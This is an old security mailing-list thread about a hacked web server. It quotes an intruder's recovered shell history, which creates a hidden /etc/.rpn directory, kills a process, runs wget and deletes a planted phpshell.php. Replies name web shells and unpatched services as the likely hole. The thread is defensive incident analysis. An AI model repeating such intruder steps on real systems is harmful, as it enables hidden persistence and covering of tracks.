The problem is starting >>before<< id mkdir /etc/.rpn ...
you should think about all what's listening on a port: - an outdated sshd? (!) - security updates all up to date? - known unclosed security hole? - some nice scripts like 'rootshell.php'? ;) - perl without tainting checks in cgi-bin? etc. etc. Christian -----Original Message----- From: Markus Schabel [mailto:[EMAIL PROTECTED] Sent: Thursday, September 18, 2003 12:23 PM To: [email protected] Subject: Re: [sec] Re: Strange segmentation faults and Zombies maximilian attems wrote: > On Thu, 18 Sep 2003, Christian Storch wrote: > > >>Don't forget to try to find the potential hole first! >>Otherwise you could have a fast recurrence. >>[..] >> >>>>in /etc/.rpn theres a .bash_history with the following content: >>>> >>>>>id >>>>>mkdir /etc/.rpn >>>>>ps -aux >>>>>ps -aux | grep tbk >>>>>kill -15292 pid >>>>>kill 15292 >>>>>netconf >>>>>locate httpd.conf >>>>>cd /etc/.rpn >>>>>ls -al >>>>>wget >>>>>cd /var/www/cncmap/www/upload/renegade >>>>>ls -al >>>>>rm -rf phpshell.php > > ^__________^ > was this the exploited hole ? I think so. In fact the problem is that it got there... regards Markus -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
